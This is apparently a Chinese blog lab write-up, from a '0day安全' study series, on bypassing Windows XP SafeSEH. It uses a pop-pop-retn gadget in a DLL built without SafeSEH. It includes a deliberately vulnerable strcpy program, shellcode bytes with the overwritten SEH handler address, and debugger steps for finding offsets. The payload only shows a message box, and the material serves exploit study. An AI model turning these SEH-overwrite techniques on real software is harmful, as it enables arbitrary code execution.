8.2 利用未启用SafeSEH模块绕过SafeSEH

已于 2022-10-24 21:47:09 修改
阅读量963 收藏 2
点赞数 1
分类专栏: 0day安全
于 2022-10-23 20:17:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/127464255
版权

SafeSEH shellcode 动态链接库 异常处理 溢出攻击
关键词由CSDN通过智能技术生成

目录

一、实验原理

二、实验环境

三、实验代码

四、实验步骤

1、生成SEH_NOSafeSEH_JUMP.DLL

2、寻找跳板

3、构造shellcode

一、实验原理

        模块未启用SafeSEH,并且该模块不是仅包含中间语言(IL),这个异常处理就可以执行、

二、实验环境

        操作系统:windows xp sp2

        软件版本:exe编译器:VS2008

                           dll编译器:VC++6.0(将dll基址设置为0x11120000)

                           原版OD

三、实验代码

        dll代码:

#include "stdafx.h"
BOOL APIENTRY DllMain( HANDLE hModule,DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    return TRUE;
}
void jump()
{
__asm{
	pop eax
	pop eax
	retn
	}
}

        exe代码:

#include "stdafx.h"
#include <string.h>
#include <windows.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


"\x12\x10\x12\x11"//address of pop pop retn in No_SafeSEH module
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"

;

DWORD MyException(void)
{
	printf("There is an exception");
	getchar();
	return 1;
}
void test(char * input)
{
	char str[200];
	strcpy(str,input);	
    int zero=0;
	__try
	{
	    zero=1/zero;
	}
	__except(MyException())
	{
	}
}
int _tmain(int argc, _TCHAR* argv[])
{
	HINSTANCE hInst = LoadLibrary(_T("SEH_NOSafeSEH_JUMP.dll"));//load No_SafeSEH module
	char str[200];
	__asm int 3
	test(shellcode);
	return 0;
}

        实验思路和代码简要解释:

        (1)用VC++6.0编译一个不使用SafeSEH的动态链接库SEH_NOSafeSEH_JUMP.DLL,然后由启用SafeSEH的应用程序SEH_NOSafeSEH.EXE去加载它;

        (2)SEH_NOSafeSEH.EXE中的test函数存在一个典型的溢出,通过向str复制超长字符串造成str溢出,进而覆盖程序的S.E.H信息;

        (3)使用SEH_NOSafeSEH_JUMP.DLL中的“pop pop retn”指令地址覆盖异常处理函数地址,然后通过制造除零异常,将程序转入异常处理。通过劫持异常处理流程,程序转入SEH_NOSafe_JUMP.DLL中执行“pop pop retn”指令,在执行retn后程序转入shellcode执行。

四、实验步骤

1、生成SEH_NOSafeSEH_JUMP.DLL

        建立一个win32的动态链接库。

        由于VC++6.0编译的DLL默认加载基址未0x10000000,如果以它作为DLL的加载地址,DLL中的“pop pop retn”指令地址中可能包含0x00,这会在进行strcpy时将字符截断复制到shellcode中,从而影响shellcode的执行。

        解释:

         因为要将pop pop retn的起始地址写入shellcode中,以便之后跳转到shellcode,因此需要避免pop pop retn的地址出现00.

        怎么改加载基址?

        在顶部菜单中选择“工程-设置”,然后切换到“连接”选项卡,在“工程选项”的输入框中添加“、base:"0x1112000"<空格>”。

         

        将编译好的dll动态链接库,复制到SEH_NOSafeSEH.EXE目录下即可。

2、寻找跳板

        首先仍然将shellcode用\x90来填充,编译,查看SafeSEH的启用情况:

        可以看到除了我们制作的DLL没有启用SafeSEH,其他的都启用了。        

注:

        使用的是od的safeSEH插件,OllySSEH对safeSEH的描述有四种:

        (1)/SafeSEH OFF,未启用SafeSEH,这种模块可以作为跳板;

        (2)/SafeSEH ON,启用SafeSEH,可以使用右键点击查看S.E.H注册情况;

        (3)No SEH,不支持SafeSEH,即IMAGE_DLLCHARACTERISTICS_NO_SET标志位被设置,模块内的异常会被忽略,所以不能作为跳板;

        (4)Error,读取错误。

        在内存映射中,找到SEH_NOSafeSEH_JUMP.DLL的代码区,然后找到“pop pop retn”。

3、构造shellcode

        找到跳板后,开始计算被溢出字符串到最近的异常处理函数指针的距离,程序执行完strcpy,查看栈区情况:

         可以看到要布置的shellcode的起始地址未0x0012FDB8.

        查看第一个异常处理函数指针位置:

        可见,第一个异常处理函数指针位于0x0012FFB0+4处。

        另外,这次使用的是“pop pop retn”指令序列,所以我们需要将弹出的“failwest“对话框的机器码放到shellcode的后半部分。

        在布置shellcode之前,需要注意到一个小细节:经过VS2008编译的程序,会在进入__try{}的函数时在security cookie+4的位置压入-2(VC++6.0下为-1),在程序进入__try{}区域时会根据改__try{}块在函数中的位置而形成不同的值。例如,函数中有两个__try{}块,在进入第一个__try{}块时,这个值会被修改为0,进入第二个的时候被修改为1。如果在__try{}块中出现了异常,程序会根据这个值调用相应的__except()处理,处理结束后这个位置的值会重新修改为-2;如果没有发生异常,程序在离开__try{}块时这个值也会被修改回-2。

        为避免shellcode关键部分被破坏,采用以下布局:shellcode最开始部分为220个字节的0x90填充;在221~224位置用SEH_NOSafeSEH_JUMP.DLL中的跳板地址0x11121012覆盖,然后跟着8字节的0x90填充;最后附上弹出"failwest"对话框的机器码。

         布置完shellcode之后,编译,在0x0012FE90处下一个断点,不出意外,程序会直接执行到这里。

         从图中可以看到,在构造的shellcode中出现了不和谐的东西,分别是dll中的跳板地址和进入try时被破坏的部分,因为这两个不和谐的东西并不影响程序的执行,因此这一节不对齐进行处理。

        直接继续允许,实验结果:

PT_silver
关注
专栏目录
第11章 利用Adobe Flash Player ActiveX 控件绕过SafeSEH
yellow的博客
10-22 286
第11.7节 利用Adobe Flash Player ActiveX 控件绕过SafeSEH
今天使用VS2012遇到一个问题:"链接器工具错误 LNK2026 XXX模块对于 SAFESEH 映像是不安全的"...
weixin_34355881的博客
07-14 176
今天使用VS2012遇到一个问题:"链接器工具错误 LNK2026 XXX模块对于 SAFESEH 映像是不安全的" 解决方法: 1.打开该项目的“属性页”对话框。 2.单击“链接器”文件夹。 3.单击“命令行”属性页。 4.将/SAFESEH:NO键入“附加选项”框中,然后点击应用。 转载于:https://www.cnblogs.com/Dageking/p...
今天使用VS2012遇到一个问题:"链接器工具错误 LNK2026 XXX模块对于 SAFESEH 映像是不安全的"...
weixin_30394633的博客
06-10 100
解决方法: 1.打开该项目的“属性页”对话框。 2.单击“链接器”文件夹。 3.单击“命令行”属性页。 4.将/SAFESEH:NO键入“附加选项”框中,然后点击应用。 转载于:https://www.cnblogs.com/hanxi/archive/2012/06/10/2544230.html...
利用启用SafeSEH模块绕过SafeSEH
weixin_30433075的博客
09-09 121
此方法可以说不是方法了·········必须程序要加载一个没用开启SafeSEH的DLL 才能去突破产生对话框 DLL模块编译: /base:"0x11120000" #include "stdafx.h" BOOL APIENTRY DllMain( HANDLE hModule,DWORD ul_reason_for_call, LPVOID lpReserved)...
vs2017 开关“/NOENTRY”只与 DLL 兼容;链接时不使用“/NOENTRY”
stone_haha_的博客
10-05 2133
严重性 代码 说明 项目 文件 行 禁止显示状态 错误 LNK1325 开关“/NOENTRY”只与 DLL 兼容;链接时不使用“/NOENTRY” test D:\lianxi\汇编\test\test\LINK 1 这个错误的原因应该是程序没有入口点。我是参照微软给的/NOENTRY的解释。给出微软的连接,里面有各种连接错误详细的介绍。 具体操作: 打开项目属性——连接器——高级——无入口点...
突破SafeSEH机制之二——利用启用SafeSEH模块绕过SafeSEH
Yx0051的博客
08-07 776
敲黑板敲黑板~~今天我们继续~ 上次讲到SafeSEH的突破,介绍了一个简单的利用绕过SafeSEH突破SafeSEH机制之一——利用绕过SafeSEH 本篇总共遇到了3个问题还没有解决,有没有大神帮我解答一下,我都把问题背景给标黄了。 突破思路: 那么有3种情况,系统可以允许异常处理函数执行: 1、异常处理函数位于加载模块内存范围之外,DEP关闭 2、异常处理函数位于加载模块内存
突破SafeSEH机制之一——利用绕过SafeSEH
Yx0051的博客
08-05 817
文章是发在吾爱破解的,这里直接转过来了 我也是个新手,刚学漏洞调试,发现要学的东西太多,想要把漏洞学好,必须精通各类系统底层机制,汇编,PE等等等等太多太多,所以不可能把这些东西都学会了,再去调试漏洞,只能一步步慢慢从简单开始,另外也要学会忽略那些你现在所力不能及的地方,如果实在不懂,就跳过,可能到哪一天你忽然就明白了。所以这里,也是希望同学们想学习的不要被这个东西吓到,静下心来慢慢看,如果有不
突破SafeSEH机制之三——利用加载模块之外的地址绕过SafeSEH
Yx0051的博客
08-09 789
敲黑板敲黑板~睡着的同学醒醒了!! 今天我们继续突破SafeSEH,上次讲到第二种思路利用启用SafeSEH模块绕过SafeSEH 今天来实现最后一个突破思路:       异常处理函数位于加载模块内存范围之外,DEP关闭------->>>在加载模块内存范围外找一个跳板指令就可以转入shellcode执行 上次我们是找到了一个加载模块内存范围内找到的一个指令,今天我们要在加载内存范围外
利用Adobe Flash Player ActiveX控件绕过SafeSEH
Yx0051的博客
08-05 1353
其实思路就是利用程序加载模块之外的内存地址,找到一个跳板指令绕过SafeSEH,flash9.2.124以前是没有SafeSEH的。 这一次试验因为涉及,mfc控件的构建,由于我虚拟机环境是vs 2008 express版本的,所以没有办法创建这种工程,直接拿别人做好的ocx文件用了。 1、第一步就是创建ActiveX mfc工程,创建一个test函数,函数中包含一个字符串覆盖的漏洞,同时注意
LINK : fatal error LNK1295: “/OPT:NOREF”与“/LTCG:incremental”规范不兼容;链接时不使用“/LTCG:incremental”
热门推荐
Endless Encoding
03-27 1万+
参见  https://blog.csdn.net/hejjunlin/article/details/68921811   这个方法无效。解决办法:项目属性-》链接器-》常规-》启用增量链接-》是项目属性-》链接器-》优化-》引用-》是...
VS2015 编译问题记录(更新)
欢迎关注公众号:【码农突围】,公号后台回复9999,可以获取一份500页的LeetCode刷题笔记。
03-31 8259
2017-03.31 记录错误 LNK1295 “/OPT:NOREF”与“/LTCG:incremental”规范不兼容;链接时不使用“/LTCG:incremental”链接器->优化然后又报如下错误:开始在命令行进行设置 /SAFESEH:NO 问题解决
模块对于SAFESEH 映像是不安全
Keivin
03-27 8347
vc 2012/2013/2015  编译时提示  模块对于 SAFESEH 映像是不安全的    msdn是这么说的  : /SAFESEH 已指定,但某一模块安全异常处理功能不兼容。如果要将此模块用于 /SAFESEH,则需要使用 Visual C++ .NET 2003(或更高版本)编译器重新编译该模块。                   应该是vc6的工程
SafeSEH原理与对抗
whatday的专栏
10-09 6144
SafeSEH原理 在 Windows XP sp2 以及之后的版本中,微软引入了 S.E.H 校验机制 SafeSEHSafeSEH 需要 OS 和 Compiler 的双重支持,二者缺一都会降低保护能力。通过启用 /SafeSEH 链接选项可心使编译好的程序具备 SafeSEH 功能(VS2003 及后续版本默认启用)。该选项会将所有异常处理函数地址提取出来,编入 SEH 表中,并将这张表...
时间&安全精细化管理平台存在授权访问漏洞
2301_77012231的博客
09-14 327
登录--时间&安全精细化管理平台存在授权访问漏洞导致与员工信息泄露。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1182
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
【农信网-注册/登录安全分析报告】
最新发布
09-16 982
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
【免费刷题】实验室安全第一知识题库分享
nulixueBe的博客
09-13 500
人工智能识别上海985大学的实验室安全知识手册,生成题库,直接刷题
vs2022怎么开safeSEH
03-27
在Visual Studio 2022中,开启SafeSEH(Safe Structured Exception Handling)可以提高应用程序的安全性,防止恶意代码利用异常处理机制进行攻击。下面是在VS2022中开启SafeSEH的步骤: 1. 打开你的项目,在解决方案资源管理器中选择你项目。 2. 右键单击项目,选择“属性”选项。 3.属性窗口中,选择“配置属性” > “链接器” > “高级”。 4. 在右侧的属性列表中,找到“启用安全异常处理(Enable Safe Exception Handling)”选项,并将其设置为“是”。 5. 点击“应用”按钮,然后点击“确定”按钮保存更改。 这样就成功开启了SafeSEH。通过这个设置,编译器会自动在生成的可执行文件中添加SafeSEH表,提供额外的保护措施来防止异常处理被滥用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值